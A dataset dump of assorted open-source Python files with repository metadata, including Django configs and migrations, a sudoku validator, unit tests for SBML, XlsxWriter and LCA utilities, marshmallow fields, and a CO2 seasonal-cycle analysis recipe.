('driver', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='vehicle_driver', to='taxi_profile.DriverProfile')),
('vehicle_type', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='vehicle_vehicle_type', to='vehicle.VehicleType')),
],
),
]
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
fbe04451994e0024a6b2f42914705abc22316a48
|
d88360329b36f9c9fd7ee7efb118d45f7dc44f5e
|
/backend/api/apps.py
|
c33832e843d3833d7b2d6cddd0f32158ebcdc0e6
|
[] |
no_license
|
hyunmin0317/Study-App
|
265a19723010b3150eac41fbaea7aa6f229e6140
|
32835258ec6ce0a981f2a359776e944b52adde81
|
refs/heads/master
| 2023-07-17T23:36:55.645573
| 2021-09-08T06:33:54
| 2021-09-08T06:33:54
| 398,130,964
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 139
|
py
|
from django.apps import AppConfig
class ApiConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'api'
|
[
"choihm9903@naver.com"
] |
choihm9903@naver.com
|
bb19442ce68445b7d0832bfe6249aa389dff37a8
|
a8123a86db99b9365b10ba76dd509d58caa7bc10
|
/python/practice/start_again/2023/07252023/valid_sudoku.py
|
bace8ea77bfaad4e5b056c4e5d44463b4ad85bc9
|
[] |
no_license
|
smohapatra1/scripting
|
c0404081da8a10e92e7c7baa8b540acc16540e77
|
3628c9109204ad98231ae8ee92b6bfa6b27e93cd
|
refs/heads/master
| 2023-08-22T20:49:50.156979
| 2023-08-22T20:43:03
| 2023-08-22T20:43:03
| 147,619,016
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,506
|
py
|
# 36. Valid Sudoku
# Determine if a 9 x 9 Sudoku board is valid. Only the filled cells need to be validated according to the following rules:
# Each row must contain the digits 1-9 without repetition.
# Each column must contain the digits 1-9 without repetition.
# Each of the nine 3 x 3 sub-boxes of the grid must contain the digits 1-9 without repetition.
# Note:
# A Sudoku board (partially filled) could be valid but is not necessarily solvable.
# Only the filled cells need to be validated according to the mentioned rules.
# Example 1:
# Input: board =
# [["5","3",".",".","7",".",".",".","."]
# ,["6",".",".","1","9","5",".",".","."]
# ,[".","9","8",".",".",".",".","6","."]
# ,["8",".",".",".","6",".",".",".","3"]
# ,["4",".",".","8",".","3",".",".","1"]
# ,["7",".",".",".","2",".",".",".","6"]
# ,[".","6",".",".",".",".","2","8","."]
# ,[".",".",".","4","1","9",".",".","5"]
# ,[".",".",".",".","8",".",".","7","9"]]
# Output: true
# Example 2:
# Input: board =
# [["8","3",".",".","7",".",".",".","."]
# ,["6",".",".","1","9","5",".",".","."]
# ,[".","9","8",".",".",".",".","6","."]
# ,["8",".",".",".","6",".",".",".","3"]
# ,["4",".",".","8",".","3",".",".","1"]
# ,["7",".",".",".","2",".",".",".","6"]
# ,[".","6",".",".",".",".","2","8","."]
# ,[".",".",".","4","1","9",".",".","5"]
# ,[".",".",".",".","8",".",".","7","9"]]
# Output: false
# Explanation: Same as Example 1, except with the 5 in the top left corner being modified to 8. Since there are two 8's in the top left 3x3 sub-box, it is invalid.
# Algorithm
# Check if the rows and columns contain values 1-9, without repetition.
# If any row or column violates this condition, the Sudoku board is invalid.
# Check to see if each of the 9 sub-squares contains values 1-9, without repetition. If they do, the Sudoku board is valid; otherwise, it is invalid.
# Checks whether there is any duplicate in current row or not
def NotInRow(arr, row):
st=set()
for i in range(0,9):
# If already encountered before,
# return false
if arr[row][i] in st:
return False
# If it is not an empty cell, insert value
# at the current cell in the set
if arr[row][i] != '.':
st.add(arr[row][i])
return True
# Checks whether there is any duplicate in current column or not
def NotInCol(arr, col):
st=set()
for i in range(0,9):
if arr[i][col] in st:
return False
if arr[i][col] !='.':
st.add(arr[i][col])
return True
# Checks whether there is any duplicate in current 3x3 box or not.
def NotInBox(arr, StartRow, StartCol):
st=set()
for row in range(0,3):
for col in range(0,3):
curr=arr[row + StartRow][col + StartCol]
if curr in st:
return False
if curr != '.':
st.add(curr)
return True
# Checks whether current row and current column and current 3x3 box is valid or not
def isValid(arr, row, col):
    return (NotInRow(arr, row) and NotInCol(arr, col) and
            NotInBox(arr, row - row % 3, col - col % 3))
def IsValidConfig(arr,n):
for i in range(0,n):
for j in range(0,n):
if not isValid(arr, i, j ):
return False
return True
if __name__ == "__main__":
#Valid
# board = [['5', '3', '.', '.', '7', '.', '.', '.', '.'],
# ['6', '.', '.', '1', '9', '5', '.', '.', '.'],
# ['.', '9', '8', '.', '.', '.', '.', '6', '.'],
# ['8', '.', '.', '.', '6', '.', '.', '.', '3'],
# ['4', '.', '.', '8', '.', '3', '.', '.', '1'],
# ['7', '.', '.', '.', '2', '.', '.', '.', '6'],
# ['.', '6', '.', '.', '.', '.', '2', '8', '.'],
# ['.', '.', '.', '4', '1', '9', '.', '.', '5'],
# ['.', '.', '.', '.', '8', '.', '.', '7', '9']]
#InValid
board = [['8', '3', '.', '.', '7', '.', '.', '.', '.'],
['6', '.', '.', '1', '9', '5', '.', '.', '.'],
['.', '9', '8', '.', '.', '.', '.', '6', '.'],
['8', '.', '.', '.', '6', '.', '.', '.', '3'],
['4', '.', '.', '8', '.', '3', '.', '.', '1'],
['7', '.', '.', '.', '2', '.', '.', '.', '6'],
['.', '6', '.', '.', '.', '.', '2', '8', '.'],
['.', '.', '.', '4', '1', '9', '.', '.', '5'],
['.', '.', '.', '.', '8', '.', '.', '7', '9']]
if IsValidConfig(board, 9 ):
print ("YES")
else:
print ("NO")
|
[
"samarendra.mohapatra121@gmail.com"
] |
samarendra.mohapatra121@gmail.com
|
fb2a76cd6a85c90f75d740c9a18b28efbc09de86
|
e94b018362431ce8b22fe306aa0db23e82362b82
|
/tests/common/test_util.py
|
ead5c31bf85ad9b6d671e2ac78f9c47528fa9607
|
[
"MIT"
] |
permissive
|
tybiot/SBMLLint
|
71745fb44f2a6e1be83e0d6854aa7b1caa700a4d
|
f11124c4059f40496454ba1adc814f1bd33c783b
|
refs/heads/master
| 2022-11-13T20:27:48.343268
| 2020-06-28T23:56:40
| 2020-06-28T23:56:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,188
|
py
|
from SBMLLint.common import constants as cn
from SBMLLint.common import exceptions
from SBMLLint.common import util
import libsbml
import numpy as np
import os
import unittest
NUM_S1 = 2
NUM_S2 = 3
IGNORE_TEST = False
ANTIMONY_STG = '''
%dS1 -> %dS2; 1
S1 = 0
S2 = 0
''' % (NUM_S1, NUM_S2)
ZIP_PATH = os.path.join(cn.BIOMODELS_DIR, cn.BIOMODELS_ZIP_FILENAME)
#############################
# Tests
#############################
class TestFunctions(unittest.TestCase):
def testGetXMLString(self):
def test(xml):
reader = libsbml.SBMLReader()
document = reader.readSBMLFromString(xml)
util.checkSBMLDocument(document)
model = document.getModel()
self.assertTrue('Reaction' in str(type(model.getReaction(0))))
def getString(path):
with open(path, 'r') as fd:
lines = '\n'.join(fd.readlines())
return lines
#
for path in [cn.TEST_FILE2, cn.TEST_FILE3]:
try:
test(util.getXML(path))
test(util.getXML(getString(path)))
except exceptions.MissingTelluriumError:
pass
def testGetXMLFromAntimony(self):
try:
xml = util.getXMLFromAntimony(ANTIMONY_STG)
except exceptions.MissingTelluriumError:
return
self.assertTrue(isinstance(xml, str))
reader = libsbml.SBMLReader()
libsbml_document = reader.readSBMLFromString(xml)
util.checkSBMLDocument(libsbml_document)
model = libsbml_document.getModel()
self.assertTrue('Reaction' in
str(type(model.getReaction(0))))
def testIsInt(self):
self.assertTrue(util.isInt(1))
self.assertFalse(util.isInt(1.5))
self.assertFalse(util.isInt('ab'))
def testIsFloat(self):
self.assertTrue(util.isFloat(1))
self.assertTrue(util.isFloat(1.5))
self.assertTrue(util.isFloat('1.5'))
self.assertFalse(util.isFloat('ab'))
def testIsSBMLModel(self):
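    # NOTE: the bare return below disables this test; everything after it is
    # dead code.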
return
self.assertFalse(util.isSBMLModel("dummy"))
xml = util.getXML(cn.TEST_FILE2)
reader = libsbml.SBMLReader()
document = reader.readSBMLFromString(xml)
util.checkSBMLDocument(document)
model = document.getModel()
self.assertTrue(util.isSBMLModel(model))
def testUniqueify(self):
class Tester():
def __init__(self, name):
self.name = name
def __repr__(self):
return self.name
def isEqual(self, other):
return self.name == other.name
#
STRING = 'abc'
REPEATED_STRING = STRING + STRING
collection = [Tester(s) for s in REPEATED_STRING]
result = util.uniqueify(collection)
self.assertEqual(len(result), len(STRING))
def testGetNextFid(self):
fid = open(ZIP_PATH, "r")
count = 0
for zip_fid in util.getNextFid(fid, is_print=False):
lines = zip_fid.read()
count += 1
self.assertGreater(len(lines), 0)
self.assertGreater(count, 0)
def testRunFunction(self):
def testFunc(a, b=2):
if b == 0:
raise(ValueError)
return a/b
#
self.assertEqual(
util.runFunction(testFunc, [6], {'b': 3}), 2)
result = util.runFunction(testFunc, [6], {'b': 0})
self.assertIsNone(result)
if __name__ == '__main__':
unittest.main()
|
[
"jlheller@uw.edu"
] |
jlheller@uw.edu
|
58467f4df4f61b2e8564e17b1028b7aef8aea879
|
2b5b082ca006eb8063a4a43f4998f4c0268a46e6
|
/sessauth2/sessauth2/asgi.py
|
dcaac02c620f4158a3c708ba0533fcbea01eccc9
|
[] |
no_license
|
shobhit1215/Rest_Framework_tut
|
a52ae5b7a1f0213ace19d9b2b5d557b15d36c376
|
351da2564a55d1530f5517627cce73663252d07c
|
refs/heads/main
| 2023-05-26T04:47:01.336843
| 2021-06-03T12:43:51
| 2021-06-03T12:43:51
| 373,503,303
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
"""
ASGI config for sessauth2 project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'sessauth2.settings')
application = get_asgi_application()
|
[
"imshobhit.sb@gmail.com"
] |
imshobhit.sb@gmail.com
|
b6334ff9ea75bda1417ea705234c6515841b743d
|
cdfcac165a7c06a137cb3563dbe31d3044494a95
|
/6_SGD/1_0_gradientTape.py
|
402b93080c204c3e0fdb1f37475164524621c459
|
[] |
no_license
|
fzingithub/learningTensorflowProject
|
141b3d980a7aa6f729cea18a72ae83d591812c83
|
5607be5f8daeb5591aba719e69b53b34b93d1e03
|
refs/heads/master
| 2020-05-19T19:05:17.495549
| 2019-09-25T06:48:04
| 2019-09-25T06:48:04
| 185,169,552
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 701
|
py
|
# -*- coding: utf-8 -*-
'''
Created on 2019/5/7
Author: zhe
Email: 1194585271@qq.com
'''
import tensorflow as tf
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# w = tf.constant(1.)
# x = tf.constant(2.)
# y = x * w
# with tf.GradientTape() as tape:
# tape.watch([w])
# y2 = x * w
#
# grad1 = tape.gradient(y, [w])
# print(grad1)
#
# with tf.GradientTape() as tape:
# tape.watch([w])
# y2 = x * w
#
# grad2 = tape.gradient(y2, [w])
# print(grad2)
# persistent
w = tf.constant(1.)
x = tf.constant(2.)
y = x * w
with tf.GradientTape(persistent=True) as tape:
tape.watch([w])
y2 = x * w
grad = tape.gradient(y2, [w])
print(grad)
grad = tape.gradient(y2, [w])
print(grad)
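# Without persistent=True, the first tape.gradient() call releases the tape's
# resources and a second call raises a RuntimeError; a persistent tape can be
# queried repeatedly (and freed with `del tape` once done).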
|
[
"1194585271@qq.com"
] |
1194585271@qq.com
|
873c85d7134a8df275df8a80775826b5150e310d
|
ec80586b3aa3e90178a59446b33948012121b56f
|
/relationship_app/admin.py
|
022de5e18e33d4fb2cca13f2b8d97b6f3ba98602
|
[] |
no_license
|
amritghimire/se
|
567f050969e0e2ad667684f1d6ca03a2f21071bf
|
6c150cb75e61b43cc938216a4e5f661d5a97aa11
|
refs/heads/master
| 2021-03-19T17:24:20.234650
| 2019-09-03T05:55:04
| 2019-09-03T05:55:04
| 112,606,113
| 0
| 0
| null | 2019-09-03T05:56:46
| 2017-11-30T11:57:56
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 201
|
py
|
from django.contrib import admin
from .models import Relationship,RelationshipWithQuestion
# Register your models here.
admin.site.register(Relationship)
admin.site.register(RelationshipWithQuestion)
|
[
"iamritghimire@gmail.com"
] |
iamritghimire@gmail.com
|
2acba97797af6087bb411fa464e5be1ea2a890ed
|
c83e356d265a1d294733885c373d0a4c258c2d5e
|
/mayan/apps/documents/migrations/0071_auto_20201128_0330.py
|
6583b82c2de0181c330da3426f188f2204c35e62
|
[
"Apache-2.0"
] |
permissive
|
TrellixVulnTeam/fall-2021-hw2-451-unavailable-for-legal-reasons_6YX3
|
4160809d2c96707a196b8c94ea9e4df1a119d96a
|
0e4e919fd2e1ded6711354a0330135283e87f8c7
|
refs/heads/master
| 2023-08-21T23:36:41.230179
| 2021-10-02T03:51:12
| 2021-10-02T03:51:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 346
|
py
|
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('documents', '0070_auto_20201128_0249'),
]
operations = [
migrations.RenameField(
model_name='document',
old_name='date_added',
new_name='datetime_created',
),
]
|
[
"79801878+Meng87@users.noreply.github.com"
] |
79801878+Meng87@users.noreply.github.com
|
a436ead0e31e3f5f505f43aab6f77de6ca2edc9e
|
e71fa62123b2b8f7c1a22acb1babeb6631a4549b
|
/xlsxwriter/test/comparison/test_escapes02.py
|
1a1af325a8fe56d1c47442561a85b514ba40e94d
|
[
"BSD-2-Clause"
] |
permissive
|
timgates42/XlsxWriter
|
40480b6b834f28c4a7b6fc490657e558b0a466e5
|
7ad2541c5f12b70be471b447ab709c451618ab59
|
refs/heads/main
| 2023-03-16T14:31:08.915121
| 2022-07-13T23:43:45
| 2022-07-13T23:43:45
| 242,121,381
| 0
| 0
|
NOASSERTION
| 2020-02-21T11:14:55
| 2020-02-21T11:14:55
| null |
UTF-8
|
Python
| false
| false
| 943
|
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2022, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('escapes02.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with comments.Check encoding of comments."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
worksheet.write('A1', '"<>\'&')
worksheet.write_comment('B2', """<>&"'""")
worksheet.set_comments_author("""I am '"<>&""")
workbook.close()
self.assertExcelEqual()
|
[
"jmcnamara@cpan.org"
] |
jmcnamara@cpan.org
|
a6ffc620d1d3aee1f0cdf209cf463c92bf609284
|
50948d4cb10dcb1cc9bc0355918478fb2841322a
|
/azure-mgmt-network/azure/mgmt/network/v2018_07_01/models/express_route_circuits_routes_table_list_result.py
|
692bb9903130c0dd3e820e34bf91cfa419fcb98f
|
[
"MIT"
] |
permissive
|
xiafu-msft/azure-sdk-for-python
|
de9cd680b39962702b629a8e94726bb4ab261594
|
4d9560cfd519ee60667f3cc2f5295a58c18625db
|
refs/heads/master
| 2023-08-12T20:36:24.284497
| 2019-05-22T00:55:16
| 2019-05-22T00:55:16
| 187,986,993
| 1
| 0
|
MIT
| 2020-10-02T01:17:02
| 2019-05-22T07:33:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,282
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ExpressRouteCircuitsRoutesTableListResult(Model):
"""Response for ListRoutesTable associated with the Express Route Circuits
API.
:param value: The list of routes table.
:type value:
list[~azure.mgmt.network.v2018_07_01.models.ExpressRouteCircuitRoutesTable]
:param next_link: The URL to get the next set of results.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[ExpressRouteCircuitRoutesTable]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ExpressRouteCircuitsRoutesTableListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
|
[
"lmazuel@microsoft.com"
] |
lmazuel@microsoft.com
|
9e51529629c36bcf385786cb805d47763c6f5ab2
|
0c325cf7a68ef51067ed8db566d525a20de5b635
|
/other/panda365/panda365/pd/api/fields.py
|
42906c17d0e2cd22fb5c65f2f94fbe5c1743ff4f
|
[] |
no_license
|
alinzel/NOTES
|
2ab6aa1ef1d601a9ae8c0d23c0df2bca7e1aa241
|
3e0594641a605580e920d0b08a251fbc99f34e2f
|
refs/heads/master
| 2023-01-08T22:48:30.762625
| 2020-01-17T09:14:47
| 2020-01-17T09:14:47
| 175,339,492
| 0
| 0
| null | 2022-12-27T15:01:19
| 2019-03-13T03:28:08
|
HTML
|
UTF-8
|
Python
| false
| false
| 6,120
|
py
|
from base64 import b64decode
from io import BytesIO
from marshmallow import fields, validate, ValidationError
from sqlalchemy import inspect
from werkzeug.datastructures import FileStorage
import binascii
import uuid
class DataURL(fields.String):
"""
data url as defined in RFC 2397:
data:[mimetype][;base64],[data]
Usually used only for parsing incoming data.
"""
default_error_messages = {
'malformed': 'cannot be parsed as a data url.',
'padding': 'payload is incorrectly padded',
'mimetype': 'mimetype not allowed',
}
def __init__(self, *args, allowed_mimetypes=None, **kwargs):
if kwargs.get('load_only') is False:
raise ValueError('this field can only be used to load data; '
'however load_only is set to False')
kwargs['load_only'] = True
kwargs.setdefault('description',
'RFC 2397 data url. '
'Format: `data:[mimetype][;base64],[data]`')
super().__init__(*args, **kwargs)
if allowed_mimetypes:
self._allowed_mimetypes = set(allowed_mimetypes)
else:
self._allowed_mimetypes = None
def validate_mimetype(self, mimetype):
if self._allowed_mimetypes and mimetype not in self._allowed_mimetypes:
self.fail('mimetype')
def _deserialize(self, value, attr, obj):
value = super()._deserialize(value, attr, obj)
if not value.startswith('data:'):
self.fail('malformed')
try:
comma_index = value.index(',')
except ValueError:
self.fail('malformed')
# 5 is for "data:"
mimetype, _ = value[5:comma_index].split(';')
if not mimetype:
self.fail('malformed')
self.validate_mimetype(mimetype)
# construct stream from data
try:
# +1 to skip the comma
data = b64decode(value[comma_index + 1:])
except binascii.Error:
self.fail('padding')
name = '{}.{}'.format(uuid.uuid4().hex, mimetype.split('/')[-1])
return FileStorage(
stream=BytesIO(data),
content_type=mimetype,
filename=name,
name=name,
)
class Currency(fields.String):
def _deserialize(self, value, attr, obj):
raise NotImplementedError() # pragma: no cover
def _serialize(self, value, attr, obj):
if value: # pragma: no cover
return {
'code': value.code,
'symbol': value.symbol
}
class Enum(fields.String):
def __init__(self, enum, choices=None, *args, **kwargs):
"""
:param enum: enum used to validate incoming value
:param list choices:
by default all items of the enum are used. If only a subset of the
enum should be used, pass them in here.
Example::
class Status(Enum):
ok = 1
fail = 2
my_dirty_internal_enum_which_should_not_be_told = 3
class FooSchema(Schema):
status = Enum(
enum=Status, choices=[Status.ok, Status.fail])
"""
self._enum = enum
validators = kwargs.setdefault('validate', [])
validators.append(validate.OneOf(choices=choices or enum))
self.default_error_messages.update(
dict(bad_enum='{value} is not a valid choice'))
super().__init__(*args, **kwargs)
def _serialize(self, value, attr, obj):
if value:
return getattr(value, 'name')
def _deserialize(self, value, attr, obj):
value = super()._deserialize(value, attr, obj)
try:
return getattr(self._enum, value)
except AttributeError:
self.fail('bad_enum', value=repr(value))
class ProductInfo(fields.String):
def __init__(self, **kwargs):
kwargs.setdefault(
'description', '''
a list of objects, each has the key `name` and
`value`. Example:
[
{
"name": "Brand",
"value": "Apple"
}, {
"name": "Country",
"value": "China"
}
]
'''
)
super().__init__(**kwargs)
def _serialize(self, value, attr, obj):
if not value:
return
ret = []
for line in value.split('\n'):
k, v = line.split(':')
ret.append(dict(name=k, value=v))
return ret
def _deserialize(self, value, attr, obj):
raise NotImplementedError() # pragma: no cover
class ModelPKField(fields.Integer):
"""A field representing a model instance.
This serializes the value to the id of the model, and deserialize from
a given id to a model instance
:param model_class: a db Model
:param filters: filters to apply when getting the record from id
"""
default_error_messages = {
'notfound': 'record cannot be found',
}
def __init__(self, model_class, *filters, **kwargs):
pks = inspect(model_class).primary_key
if len(pks) > 1: # pragma: no cover
raise ValueError('only support models with 1 primary key')
self.model = model_class
self.filters = filters
self.pk_name = pks[0].name
super().__init__(**kwargs)
# def _serialize(self, value, attr, obj):
# if isinstance(value, self.model):
# return getattr(value, self.pk_name)
def _deserialize(self, value, attr, obj):
value = super()._deserialize(value, attr, obj)
filters = []
for f in self.filters:
if callable(f):
f = f()
filters.append(f)
obj = self.model.query.filter(
getattr(self.model, self.pk_name) == value,
*filters
).first()
if not obj:
raise ValidationError('{} {} cannot be found'.format(
self.model.__name__, value,
))
return obj
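# ---------------------------------------------------------------------------
# Minimal usage sketch (an illustrative assumption, not part of the original
# module): wiring the Enum field above into a marshmallow-2-style schema.
# `Status` and `TaskSchema` are hypothetical names introduced here.
if __name__ == '__main__':
    import enum as _enum
    from marshmallow import Schema

    class Status(_enum.Enum):
        ok = 1
        fail = 2

    class TaskSchema(Schema):
        status = Enum(enum=Status, choices=[Status.ok, Status.fail])

    result = TaskSchema().load({'status': 'ok'})
    print(result.data)  # {'status': <Status.ok: 1>} under marshmallow 2.x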
|
[
"944951481@qq.com"
] |
944951481@qq.com
|
3f197feb9ea3a2c2da2ddc7cde1f71136c78662a
|
35baf7fe5bb66f2402de400383b8aa426c097bfb
|
/co2_diag/recipes/seasonal_cycles.py
|
95de0cc00e4835814255f8121b1a1b9cd8473448
|
[
"BSD-3-Clause"
] |
permissive
|
BunnyVon/gdess
|
24f0e7e1e6d2a00dbbcd9e3fa72e65d983b6567a
|
09b83b3d7ade133b6d993e010912bee86c24c934
|
refs/heads/main
| 2023-07-18T06:11:09.937268
| 2021-09-05T19:09:10
| 2021-09-05T19:09:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,919
|
py
|
""" This produces plots of seasonal cycles of atmospheric CO2
This function parses:
- observational data from Globalview+ surface stations
- model output from CMIP6
================================================================================
"""
from co2_diag import set_verbose, benchmark_recipe
from co2_diag.recipe_parsers import parse_recipe_options, add_seasonal_cycle_args_to_parser
from co2_diag.recipes.recipe_utils import populate_station_list
from co2_diag.graphics.comparison_plots import plot_comparison_against_model, plot_lines_for_all_station_cycles
from co2_diag.operations.Confrontation import Confrontation, load_cmip_model_output
from co2_diag.formatters import numstr, append_before_extension
from dask.diagnostics import ProgressBar
from typing import Union
import argparse, logging
_logger = logging.getLogger(__name__)
@benchmark_recipe
def seasonal_cycles(options: Union[dict, argparse.Namespace],
verbose: Union[bool, str] = False,
) -> tuple:
"""Execute a series of preprocessing steps and generate a diagnostic result.
Relevant co2_diag collections are instantiated and processed.
    If one station is specified, it will be compared against model data at the same location.
    If more than one station is specified, no model data will be compared against the observations.
Parameters
----------
options : Union[dict, argparse.Namespace]
Recipe options specified as key:value pairs. It can contain the following keys:
ref_data : str
(required) directory containing the NOAA Obspack NetCDF files
model_name : str, default 'CMIP.NOAA-GFDL.GFDL-ESM4.esm-hist.Amon.gr1'
cmip_load_method : str, default 'pangeo'
either 'pangeo' (which uses a stored url),
or 'local' (which uses the path defined in config file)
start_yr : str, default '1960'
end_yr : str, default '2015'
latitude_bin_size : numeric, default None
figure_savepath : str, default None
difference : str, default None
globalmean : str
either 'station', which requires specifying the <station_code> parameter,
or 'global', which will calculate a global mean
station_list : str, default 'mlo'
a sequence of three letter codes (space-delimited) to specify
the desired surface observing station
verbose : Union[bool, str]
can be either True, False, or a string for level such as "INFO, DEBUG, etc."
Returns
-------
A tuple:
A DataFrame containing the data that were plotted.
A list of the data for each station
A DataFrame containing the metadata for each station
(and if a comparison with a model was made, then the datetimes and values are also part of the returned tuple)
"""
set_verbose(_logger, verbose)
if verbose:
ProgressBar().register()
_logger.debug("Parsing diagnostic parameters...")
opts = parse_recipe_options(options, add_seasonal_cycle_args_to_parser)
stations_to_analyze = populate_station_list(opts.run_all_stations, opts.station_list)
# --- Load CMIP model output ---
compare_against_model, ds_mdl = load_cmip_model_output(opts.model_name, opts.cmip_load_method, verbose=verbose)
conf = Confrontation(compare_against_model, ds_mdl, opts, stations_to_analyze, verbose)
cycles_of_each_station, concatenated_dfs, df_station_metadata, \
xdata_obs, xdata_mdl, ydata_obs, ydata_mdl, \
rmse_y_true, rmse_y_pred = conf.looper(how='seasonal')
    # --- Plot the seasonal cycles at all station locations
    # (i) Globalview+ obs data
plot_lines_for_all_station_cycles(xdata_obs, ydata_obs.iloc[:, ::-1], figure_title="GV+",
savepath=append_before_extension(opts.figure_savepath, 'obs_lineplot'))
if ydata_mdl is not None:
# (ii) CMIP data
plot_lines_for_all_station_cycles(xdata_obs, ydata_mdl.iloc[:, ::-1], figure_title="CMIP",
savepath=append_before_extension(opts.figure_savepath, 'mdl_lineplot'))
# (iii) Model - obs difference
ydiff = ydata_mdl - ydata_obs
plot_lines_for_all_station_cycles(xdata_obs, ydiff.iloc[:, ::-1], figure_title="Difference",
savepath=append_before_extension(opts.figure_savepath, 'diff_lineplot'))
        # (iv) Model and obs overlapped
        plot_comparison_against_model(xdata_obs, ydata_obs, 'obs',
                                      xdata_obs, ydata_mdl, 'model',
                                      savepath=append_before_extension(opts.figure_savepath, 'overlapped'))
    _logger.info("Saved at <%s>", opts.figure_savepath)
return concatenated_dfs, cycles_of_each_station, df_station_metadata
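# ---------------------------------------------------------------------------
# Minimal invocation sketch (illustrative; the path, years, and station code
# below are placeholder assumptions, not values from this repository):
#
#     opts = {
#         'ref_data': '/path/to/obspack/netcdf',  # hypothetical directory
#         'station_list': 'mlo',
#         'start_yr': '1980',
#         'end_yr': '2010',
#         'figure_savepath': 'seasonal_cycle.png',
#     }
#     dfs, per_station, metadata = seasonal_cycles(opts, verbose='INFO')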
|
[
"dkauf42@gmail.com"
] |
dkauf42@gmail.com
|
f78f19d145b126047de673d89f70e08fdc0684a7
|
3cf0d750948a758d5771dd778fbb783d64a044ae
|
/src/pads/tests/test_lca.py
|
b11cbc743ce87210e3a1d60e058e855380055c1b
|
[
"CC-BY-NC-SA-4.0",
"Apache-2.0",
"MIT"
] |
permissive
|
hbulpf/pydemo
|
6552a08b3c85721ac1b2ba335b030e234ad03b6c
|
ea3e9f9086116a86ecef803e9e3179a34c94c20f
|
refs/heads/master
| 2022-11-30T21:06:29.933820
| 2022-01-15T17:05:16
| 2022-01-15T17:05:16
| 237,584,300
| 6
| 1
|
Apache-2.0
| 2022-11-22T09:49:38
| 2020-02-01T08:20:43
|
Python
|
UTF-8
|
Python
| false
| false
| 1,413
|
py
|
import random
import unittest
from pads.lca import RangeMin
from pads.lca import LogarithmicRangeMin
from pads.lca import LCA
from pads.lca import OfflineLCA
class RandomRangeMinTest(unittest.TestCase):
def testRangeMin(self):
for trial in range(20):
data = [random.choice(range(1000000))
for i in range(random.randint(1,100))]
R = RangeMin(data)
for sample in range(100):
i = random.randint(0,len(data)-1)
j = random.randint(i+1,len(data))
self.assertEqual(R[i:j],min(data[i:j]))
class LCATest(unittest.TestCase):
parent = {'b':'a','c':'a','d':'a','e':'b','f':'b','g':'f','h':'g','i':'g'}
lcas = {
('a','b'):'a',
('b','c'):'a',
('c','d'):'a',
('d','e'):'a',
('e','f'):'b',
('e','g'):'b',
('e','h'):'b',
('c','i'):'a',
('a','i'):'a',
('f','i'):'f',
}
def testLCA(self):
L = LCA(self.parent)
for k,v in self.lcas.items():
self.assertEqual(L(*k),v)
def testLogLCA(self):
L = LCA(self.parent, LogarithmicRangeMin)
for k,v in self.lcas.items():
self.assertEqual(L(*k),v)
def testOfflineLCA(self):
L = OfflineLCA(self.parent, self.lcas.keys())
for (p,q),v in self.lcas.items():
self.assertEqual(L[p][q],v)
|
[
"hudalpf@163.com"
] |
hudalpf@163.com
|
c9b58a0e23df735180efc08cacda6fe5dd2b365f
|
612e9449ddbe95f1b4a0dd21e13e46661e39c872
|
/lib/formats/json.py
|
3c6e746b04f54281505f5b27327aa67f161ddd3f
|
[] |
no_license
|
racposner/label_reconciliations
|
0ad22c8250a5d6662e9aeebeb97741146ac8fdac
|
4c916994e7f193e6ed0b1c6b18f247239f1d847a
|
refs/heads/master
| 2022-11-27T02:00:51.108238
| 2020-07-28T18:47:53
| 2020-07-28T18:47:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 302
|
py
|
"""Import a flat JSON file as unreconciled data."""
import pandas as pd
import lib.util as util
def read(args):
"""Read a JSON file into a data-frame."""
unreconciled = pd.read_json(args.input_file)
unreconciled = util.unreconciled_setup(args, unreconciled)
return unreconciled, {}
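# Minimal usage sketch (illustrative assumption: an argparse-style namespace
# carrying at least an `input_file` attribute, matching how `read` uses it):
#
#     from argparse import Namespace
#     unreconciled, column_types = read(Namespace(input_file='raw.json'))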
|
[
"raphael.lafrance@gmail.com"
] |
raphael.lafrance@gmail.com
|
8c0e06b23fc473400d9b904b94698f979e0ff6ef
|
9b34e542589b7d0d327d3255ac4fcd0bcf5e7216
|
/first one from right to left in binary.py
|
e09a044e3aaf81efa19205fa549a8331750abc86
|
[] |
no_license
|
Sravaniram/pythonprogramming
|
9ee23cd2ff925fa2c6af320d59643747db173cd7
|
